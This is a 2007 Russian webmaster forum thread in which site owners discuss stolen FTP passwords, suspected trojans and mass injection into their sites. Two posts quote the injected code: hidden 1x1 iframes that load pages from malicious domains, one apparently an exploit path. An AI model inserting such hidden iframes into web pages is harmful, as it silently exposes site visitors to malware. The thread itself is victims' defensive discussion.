Master-X
Форум | Новости | Статьи
Главная » Форум » Читеры и Разгильдяи » 
Тема: Взлом фтп
цитата
18/05/07 в 14:00
 Юнга
Hide-R писал:
pierx: У KeePass, на котором я сижу он очень мощный.


Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. icon_smile.gif

А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..
цитата
18/05/07 в 19:35
 color
Юнга писал:
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. icon_smile.gif

А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..

в висте вообще то встроенный автобэкап достаточно удобный есть.
я через него ноут на десктоп бэкаплю icon_smile.gif
цитата
18/05/07 в 19:58
 Swapper
Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.
цитата
18/05/07 в 20:31
 Stek
просто надо нормальный софт использовать а не качать крэки с вареза, тогда шансы быть затрояненным сильно уменьшаются
цитата
18/05/07 в 22:34
 Kors
Stek: тут дело не в креках.
я тоже такую заразу поймал, и даже почти догадываюсь где...

Swapper: проверь вот это: %windows%\csrss.exe

по принципу действия очень похож на тот что Ман ссылку давал, тоже имитирует нажатия кнопок в окнах сообщений (т.е. оутпост и каспер не спасают) запускается как системный процесс - просто так не снимешь.
цитата
19/05/07 в 13:22
 localhost
если есть паранойя или подозрение, запускайте AVZ4 с опциями поиска рут-китов и юзер-китов и максимальным уровнем анализа
цитата
19/05/07 в 23:40
 case
пиздец какой то. на всех доменах поголовно на мордах ифрейм
что он грузит ..х.знает но грузит что то тяжелое в комп и сеть начинает тупить.

везде вот это

Код:

<iframe src='чttp://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='чttp://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
цитата
20/05/07 в 12:24
 miroz
Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?
цитата
20/05/07 в 14:38
 zteam

Есть небольшое подозрение, что подцепил кто-то из саппорта разработчиков софта(сж-скриптов, ротаторов, к примеру), которые для установки этого софта просят фтп/ssh-доступ на сервак.
цитата
20/05/07 в 14:53
 color
miroz писал:
Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?

да эпидемия уже несколько месяцев идет
цитата
20/05/07 в 15:09
 case
ну у меня к примеру нет сиджеев, а трой стоял даже на тех сайтах где вообще ничего нет, один индекс с надписью comming soon
и с сапортом я не общаюсь ни с каким. по аське пароли тоже не проходили
цитата
20/05/07 в 15:26
 color

может пароли хранил в фтп-клиенте? или еще где на компе
цитата
20/05/07 в 16:06
 _Milan_
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....
цитата
21/05/07 в 01:30
 Hide-R
Юнга писал:
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. icon_smile.gif

А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..

Бекап мне плагин делает. Их пара есть на странице плагинов KeePass...
цитата
21/05/07 в 09:41
 Kors
_Milan_ писал:
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....

угу, а то что я какую то дрянь при этом у себя нашел - это типа совпадение?
цитата
21/05/07 в 10:36
 awa
Milan, очень информативно отписал, спасибо

/me пометил себе "совсем не троянами.."
цитата
21/05/07 в 17:33
 case
понеслось по второму кругу, только с домена РУ на сей раз. начал массово менять пароли, может поможет.

проверяйте свои сайты.
цитата
22/05/07 в 09:05
 miroz
Бляяяя, вот, сидишь читаешь, думаешь с тобой такого не случитьсяicon_sad.gif(
Сегодня прихожу. смотрю на одном сайте провалилась прода и траф ниже плинтуса, открываю, а там бля такая хуйня icon_sad.gif

Код:
<iframe src="http://antispyx.info/exp/" width=1 height=1 style="display:none"></iframe>


Самое интересное, на этом дедике несколько сайтов, более того на этом айпищнике несколько доменов, НО ифрем вставили только на одном домене, на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрытьicon_sad.gif(
Вот и думайте.
На других доменах ничего не повесили.

Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на другихicon_sad.gif(

Бля, с этим надо что-то делать!

ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?
цитата
22/05/07 в 09:12
 XXX-Server
miroz писал:
на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрытьicon_sad.gif(
Вот и думайте.
На других доменах ничего не повесили.

Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на другихicon_sad.gif(

ну у разработчика скрипта троян значит, что непонятного то
Цитата:

ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?

в файерволе закрыть 21 порт и разрешить только для своего IP
цитата
22/05/07 в 09:17
 miroz
Swapper писал:
Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.


Подозреваю, что это не через трояна ставят, но как не знаюicon_sad.gif
цитата
22/05/07 в 09:18
 miroz
XXX-Server писал:

в файерволе закрыть 21 порт и разрешить только для своего IP

В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружуicon_sad.gif
цитата
22/05/07 в 09:31
 XXX-Server
miroz писал:
В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружуicon_sad.gif

ну админа попросить значит icon_smile.gif
цитата
22/05/07 в 09:36
 miroz
_Milan_ писал:
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....

Может подробности расскажешь?
цитата
22/05/07 в 09:38
 miroz
XXX-Server писал:
ну админа попросить значит icon_smile.gif

Админа хрен достанешьicon_sad.gif(
цитата
22/05/07 в 09:40
 XXX-Server
miroz писал:
Админа хрен достанешьicon_sad.gif(

ну мы можем сделать, за небольшую плату и при наличии свободного времени icon_smile.gif
стукни ближе к вечеру к колору, 10-95-48-1-7-9
Стр. « первая   <  1, 2, 3, 4, 5  >  последняя »


Эта страница в полной версии